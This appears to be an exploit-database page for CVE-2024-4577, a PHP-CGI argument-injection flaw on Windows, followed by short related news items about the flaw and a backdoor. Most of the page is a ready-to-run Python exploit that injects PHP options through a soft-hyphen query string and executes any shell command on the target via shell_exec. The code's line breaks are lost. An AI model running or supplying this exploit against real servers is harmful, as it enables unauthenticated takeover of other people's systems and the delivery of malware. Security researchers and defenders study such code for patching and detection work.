Headline
PHP Remote Code Execution
PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py ''') def exploit(url, command): payloads = { '<?php echo "vulnerable"; ?>', '<?php echo shell_exec("'+command+'"); ?>' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session() for payload in payloads: url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text)if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])
Related news
A previously undocumented backdoor named Msupedge has been put to use against a cyber attack targeting an unnamed university in Taiwan. "The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. The origins of the backdoor are
Gentoo Linux Security Advisory 202408-32 - Multiple vulnerabilities have been discovered in PHP, the worst of which can lead to a denial of service. Versions greater than or equal to 8.1.29:8.1 are affected.
Multiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets. The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It
This Metasploit module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D) character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch), and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches. XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.
An RCE vulnerability that affects the Web scripting language on Windows systems is easy to exploit and can provide a broad attack surface.